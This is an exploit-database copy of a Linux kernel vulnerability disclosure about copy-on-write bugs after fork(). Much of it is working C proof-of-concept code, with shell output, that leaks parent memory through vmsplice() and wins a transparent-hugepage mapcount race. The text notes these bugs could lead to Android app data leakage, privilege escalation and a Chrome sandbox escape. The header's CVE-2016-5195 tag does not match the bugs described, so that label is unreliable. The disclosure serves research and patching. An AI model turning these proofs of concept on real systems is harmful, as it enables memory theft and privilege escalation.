Linux CoW Incorrect Access Grant

CVE:               CVE-2016-5195
Category:          CWE-264
Price:             $1000
Severity:          Critical
Author:            Unknown
Risk:              Critical
Exploitation Type: Local
Date:              2020-08-25
CPE:               cpe:/o:linux:linux_kernel
CVSS vector:       CVSS:4.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS:              0.02192
EPSS Percentile:   0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020080129

Below is a copy:

Linux CoW Incorrect Access Grant
Linux: CoW can wrongly grant write access (because of pinned references or THP bug)

I've stumbled over two ways in which copy-on-write of anonymous memory after
fork() is currently broken: page references held only via the page refcount,
and a bug in the THP logic.

== Page refcount isn't being accounted for ==
This one's fairly straightforward:

```
$ cat vmsplice.c
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
#include <err.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <sys/wait.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static void *data;

static void child_fn(void) {
  int pipe_fds[2];
  SYSCHK(pipe(pipe_fds));
  struct iovec iov = {.iov_base = data, .iov_len = 0x1000 };
  SYSCHK(vmsplice(pipe_fds[1], &iov, 1, 0));
  SYSCHK(munmap(data, 0x1000));
  sleep(2);
  char buf[0x1000];
  SYSCHK(read(pipe_fds[0], buf, 0x1000));
  printf(\"read string from child: %s\
\", buf);
}

int main(void) {
  if (posix_memalign(&data, 0x1000, 0x1000))
    errx(1, \"posix_memalign()\");
  strcpy(data, \"BORING DATA\");

  pid_t child = SYSCHK(fork());
  if (child == 0) {
    child_fn();
    return 0;
  }

  sleep(1);
  strcpy(data, \"THIS IS SECRET\");

  int status;
  SYSCHK(wait(&status));
}
$ gcc -o vmsplice vmsplice.c && ./vmsplice
read string from child: THIS IS SECRET
$
```

As you can see, the fork() child can read memory from the parent by grabbing a
refcounted reference to a page with vmsplice(), then dropping the page from its
pagetables. This is because the CoW fault handler grants the parent write access
to the original page if its mapcount indicates that nobody else has it mapped.
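
For reference, the reuse decision in the anonymous CoW fault path boils down to
roughly the following (a paraphrased sketch, not verbatim kernel code;
page_mapcount(), wp_page_reuse() and wp_page_copy() are the relevant
mm/memory.c helpers, but the real condition goes through reuse_swap_page() and
is more involved):

```
/* Paraphrased sketch of the reuse decision in the anonymous CoW fault
 * path (heavily simplified, not verbatim kernel code). The point: only
 * the *mapcount* is consulted, so a reference that exists purely in the
 * page *refcount* (e.g. one taken by vmsplice()) is invisible here. */
if (page_mapcount(page) == 1) {
        /* "nobody else maps this page": keep writing to the original
         * page, even though a pipe may still hold a refcount-only
         * reference to it and can read whatever gets written */
        wp_page_reuse(vmf);
} else {
        /* somebody else still maps the page: copy it for the faulter */
        wp_page_copy(vmf);
}
```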

This could potentially have security implications in environments like Android,
where (almost) all apps are forked from a common zygote process. In the
following scenario, this would lead to data leakage between apps:

 - zygote writes to page X (ensuring that any preexisting CoW is broken)
 - zygote forks off an attacker-controlled child process C1
 - C1 grabs page X into a pipe with vmsplice()
 - C1 drops its mapcount on page X
 - zygote forks off a victim child process C2
 - zygote writes to page X (resolving CoW fault by duplicating the page)
 - C2 writes secret data to page X (resolving CoW fault by granting write access
   to the original page)
 - C1 reads secret data from the pipe

However, so far I haven't managed to actually leak data from another app with
this one.
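
For illustration, the scenario above can be condensed into a single program in
which the parent plays the zygote and its two children play C1 and C2. This is
a rough, untested sketch (it reuses the SYSCHK macro from above and
approximates the ordering with sleep() instead of proper synchronization):

```
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/uio.h>
#include <sys/wait.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static void *data; /* page X */

int main(void) {
  if (posix_memalign(&data, 0x1000, 0x1000))
    errx(1, "posix_memalign()");
  strcpy(data, "BORING DATA");              /* zygote writes to page X */

  pid_t c1 = SYSCHK(fork());                /* attacker child C1 */
  if (c1 == 0) {
    int pipe_fds[2];
    SYSCHK(pipe(pipe_fds));
    struct iovec iov = {.iov_base = data, .iov_len = 0x1000};
    SYSCHK(vmsplice(pipe_fds[1], &iov, 1, 0)); /* grab page X into a pipe */
    SYSCHK(munmap(data, 0x1000));              /* drop C1's mapping of X */
    sleep(3);
    char buf[0x1000];
    SYSCHK(read(pipe_fds[0], buf, 0x1000));
    printf("C1 read from pipe: %s\n", buf);    /* C2's data, if it worked */
    return 0;
  }

  sleep(1);                                 /* let C1 vmsplice() and munmap() */
  pid_t c2 = SYSCHK(fork());                /* victim child C2 */
  if (c2 == 0) {
    sleep(1);                               /* let the zygote write first */
    strcpy(data, "C2 SECRET");              /* CoW fault reuses the original page */
    sleep(2);
    return 0;
  }

  strcpy(data, "ZYGOTE DATA");              /* zygote's CoW fault copies page X */

  int status;
  SYSCHK(wait(&status));
  SYSCHK(wait(&status));
  return 0;
}
```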


== THP mapcount check is racy ==
This one is somewhat more severe. Basically, there is a race between
__split_huge_pmd_locked() and page_trans_huge_map_swapcount() that can cause the
THP CoW fault path to ignore up to two other mappings if one other process is
concurrently shattering its THP mapping. I think this may have been introduced
in commit 6d0a07edd17c ("mm: thp: calculate the mapcount correctly for THP
pages during WP faults").

page_trans_huge_map_swapcount() first looks at 4K mapcounts, then looks at the
DoubleMap flag and the compound_mapcount(page).
__split_huge_pmd_locked() can concurrently move references from the
compound mapcount over to the 4K mapcounts.
There are no common locks between the two.
Therefore, essentially, page_trans_huge_map_swapcount() can observe the old
state of the 4K mapcounts (which don't yet account for the other mapping)
combined with the new state of the hugepage mapcount (which doesn't account for
the other mapping anymore).

It is possible for not just one, but two mappings to be ignored because of the
DoubleMap flag: If page_trans_huge_map_swapcount() observes the old state
of the 4K mapcounts, but the new state of the DoubleMap flag, it will
incorrectly subtract 1 from the result in addition to not observing the mapcount
of the __split_huge_pmd_locked() caller.

Here is a PoC that demonstrates the issue with two mappings (testing in a KVM
guest):

-----------------------------------------------------------
user@vm:~/tmp/transhuge$ cat thp_munmap.c
#include <sys/mman.h>
#include <err.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/eventfd.h>

int main(void) {
  volatile char *mapping = mmap((void*)0x200000, 0x200000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
  if (mapping == MAP_FAILED)
    err(1, \"mmap\");
  *mapping = 1;
  system(\"cat /proc/$PPID/smaps | head -n40; echo =======================\");

  int efd = eventfd(0, 0);

  unsigned long long iteration = 0;
  while (1) {
    iteration++;
    *mapping = 1;
    pid_t child = fork();
    if (child == -1) err(1, \"fork\");
    if (child == 0) {
      if (munmap((void*)(mapping+0x1000), 0x1f0000)) err(1, \"munmap\");

      // wait for parent to tell us to measure and exit
      uint64_t dummy;
      if (eventfd_read(efd, &dummy)) err(1, "eventfd_read");

      if (*mapping != 1)
        errx(1, "broken cow: expected 1, got %hhd, in iteration %llu", *mapping, iteration);
      //system("cat /proc/$PPID/smaps | head -n40; echo =======================");
      exit(0);
    }

    *mapping = 2;

    // tell child to continue
    if (eventfd_write(efd, 1)) err(1, "eventfd_write");

    int status;
    if (waitpid(child, &status, 0) != child) err(1, "waitpid");
  }
}
user@vm:~/tmp/transhuge$ gcc -o thp_munmap thp_munmap.c
user@vm:~/tmp/transhuge$ ./thp_munmap 
00200000-00400000 rw-p 00000000 00:00 0 
Size:               2048 kB
KernelPageSize:        4 kB
MMUPageSize:           4 kB
Rss:                2048 kB
Pss:                2048 kB
Shared_Clean:          0 kB
Shared_Dirty:          0 kB
Private_Clean:         0 kB
Private_Dirty:      2048 kB
Referenced:         2048 kB
Anonymous:          2048 kB
LazyFree:              0 kB
AnonHugePages:      2048 kB
[...]
=======================
thp_munmap: broken cow: expected 1, got 2, in iteration 48580
thp_munmap: broken cow: expected 1, got 2, in iteration 239811
^C
user@vm:~/tmp/transhuge$ 
-----------------------------------------------------------

By relying on khugepaged, it is even possible to trigger this issue without
explicit mm syscalls, just malloc(), fork() and free(), as long as the kernel is
configured to automatically collapse hugepages with khugepaged (which seems to
be the case e.g. on Debian):

-----------------------------------------------------------
$ cat thp_malloc_large_nosleep.c
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <stdint.h>
#include <err.h>
#include <sys/eventfd.h>
#include <sys/poll.h>
#include <sys/wait.h>

int main(void) {
  int efd = eventfd(0, 0);

  char *a = malloc(0x1fe000);
  char *b = malloc(0x1fe000);

  printf(\"a = %p, b = %p\
\", a, b);

  printf(\"waiting for keypress...\
\");

  // we want khugepaged to create a hugepage that
  // covers parts of `a` and `b` here
  while (1) {
    struct pollfd pollfd = {.fd = 0, .events = POLLIN};
    if (poll(&pollfd, 1, 1000) == 1)
      break;
    memset(a, 'A', 0x1fe000);
    memset(b, 'B', 0x1fe000);
  }

  unsigned long long iteration = 0;
  while (1) {
    iteration++;
    a[0] = 1;
    pid_t child = fork();
    if (child == -1) err(1, \"fork\");
    if (child == 0) {
      // shatter hugepage
      free(b);

      // wait for parent to tell us to measure and exit
      uint64_t dummy;
      if (eventfd_read(efd, &dummy)) err(1, "eventfd_read");

      if (a[0] != 1)
        printf("broken cow: expected 1, got %hhd, in iteration %llu\n",
               a[0], iteration);
      exit(0);
    }

    // normally this should copy the hugepage (or fall back to
    // creating a 4K-page copy), but if we win the race it'll
    // write directly to the original page
    a[0] = 2;

    // tell child to continue
    if (eventfd_write(efd, 1)) err(1, "eventfd_write");

    int status;
    if (waitpid(child, &status, 0) != child) err(1, "waitpid");
  }
}
$ gcc -O2 -o thp_malloc_large_nosleep thp_malloc_large_nosleep.c
$ ./thp_malloc_large_nosleep 
a = 0x7f49c2e28010, b = 0x7f49c2c29010
waiting for keypress...
[wait until khugepaged has collapsed the page according to smaps,
then press enter and wait]

broken cow: expected 1, got 2, in iteration 333209
broken cow: expected 1, got 2, in iteration 703886
broken cow: expected 1, got 2, in iteration 850974
broken cow: expected 1, got 2, in iteration 1014706
broken cow: expected 1, got 2, in iteration 1137223
broken cow: expected 1, got 2, in iteration 1143961
broken cow: expected 1, got 2, in iteration 1176183
broken cow: expected 1, got 2, in iteration 1970669
^C
$
-----------------------------------------------------------
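
Whether khugepaged will actually collapse the malloc()ed regions (the "wait
until khugepaged has collapsed the page according to smaps" step above)
depends on the transparent_hugepage configuration. The following is a small
sketch of a helper that dumps the relevant sysfs knobs and sums the
AnonHugePages counters from an smaps file (standard sysfs/procfs paths; pass
/proc/<pid>/smaps of the PoC process to inspect it):

```
// Dump THP configuration and sum the AnonHugePages counters from an smaps
// file (defaults to the current process).
#include <stdio.h>

static void dump_file(const char *path) {
  char buf[256];
  FILE *f = fopen(path, "r");
  if (!f) { printf("%s: <unavailable>\n", path); return; }
  while (fgets(buf, sizeof(buf), f))
    printf("%s: %s", path, buf);
  fclose(f);
}

int main(int argc, char **argv) {
  // "[always] madvise never": with "always", khugepaged may collapse any
  // eligible anonymous region; with "madvise", only MADV_HUGEPAGE regions.
  dump_file("/sys/kernel/mm/transparent_hugepage/enabled");
  // khugepaged scan-rate knobs, useful for estimating how long to wait
  dump_file("/sys/kernel/mm/transparent_hugepage/khugepaged/scan_sleep_millisecs");
  dump_file("/sys/kernel/mm/transparent_hugepage/khugepaged/pages_to_scan");

  const char *smaps_path = argc > 1 ? argv[1] : "/proc/self/smaps";
  FILE *smaps = fopen(smaps_path, "r");
  if (!smaps) { perror(smaps_path); return 1; }
  char line[256];
  unsigned long total_kb = 0, kb;
  // a nonzero total means at least one anonymous mapping is THP-backed
  while (fgets(line, sizeof(line), smaps))
    if (sscanf(line, "AnonHugePages: %lu kB", &kb) == 1)
      total_kb += kb;
  fclose(smaps);
  printf("%s: AnonHugePages total: %lu kB\n", smaps_path, total_kb);
  return 0;
}
```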


The three-process version of this is probably more interesting for local
privilege escalation attacks (since you can gain write access to the memory of a
process that is not participating in the race at all); however, it also has a
much narrower race window: One process needs to go through the critical section
of __split_huge_pmd_locked() while another one is stuck in this part of
page_trans_huge_map_swapcount():

        for (i = 0; i < HPAGE_PMD_NR; i++) {
                // race region begins with this atomic_read() in the
                // last iteration
                mapcount = atomic_read(&page[i]._mapcount) + 1;
                _total_mapcount += mapcount;
                if (map) {
                        swapcount = swap_count(map[offset + i]);
                        _total_swapcount += swapcount;
                }
                map_swapcount = max(map_swapcount, mapcount + swapcount);
        }
        unlock_cluster(ci);
        // race region ends with the PG_double_map test in here
        if (PageDoubleMap(page)) {
                map_swapcount -= 1;
                _total_mapcount -= HPAGE_PMD_NR;
        }
        mapcount = compound_mapcount(page);

An attacker can't preempt the task here because it's holding a spinlock; but
IRQs are on, so e.g. TLB flush IPIs from another thread can interrupt execution
for quite some time. (But I haven't really figured out yet how accurately you
could hit this race; according to some early experiments I've done, it looks
like if you know the exact configuration of the system, you may be able to cause
the TLB flush to happen in the race window with a probability around 0.3% or so,
and then you'd need to additionally have __split_huge_pmd_locked() happen at the
right time.)

If an attacker could write a sufficiently fast attack for this issue, they might
be able to use it to break out of e.g. the Chrome renderer sandbox on normal
Linux desktop systems - Chrome on Linux creates untrusted renderers as child
processes of a \"zygote\" process, which doesn't seem to be fully sandboxed, so an
attacker controlling two of its children could potentially use this bug to cause
memory corruption in the zygote.


This bug is subject to a 90 day disclosure deadline. After 90 days elapse,
the bug report will become visible to the public. The scheduled disclosure
date is 2020-08-25. Disclosure at an earlier date is possible if
the bug has been fixed in Linux stable releases (per agreement with
[email protected] folks).




Found by: [email protected]
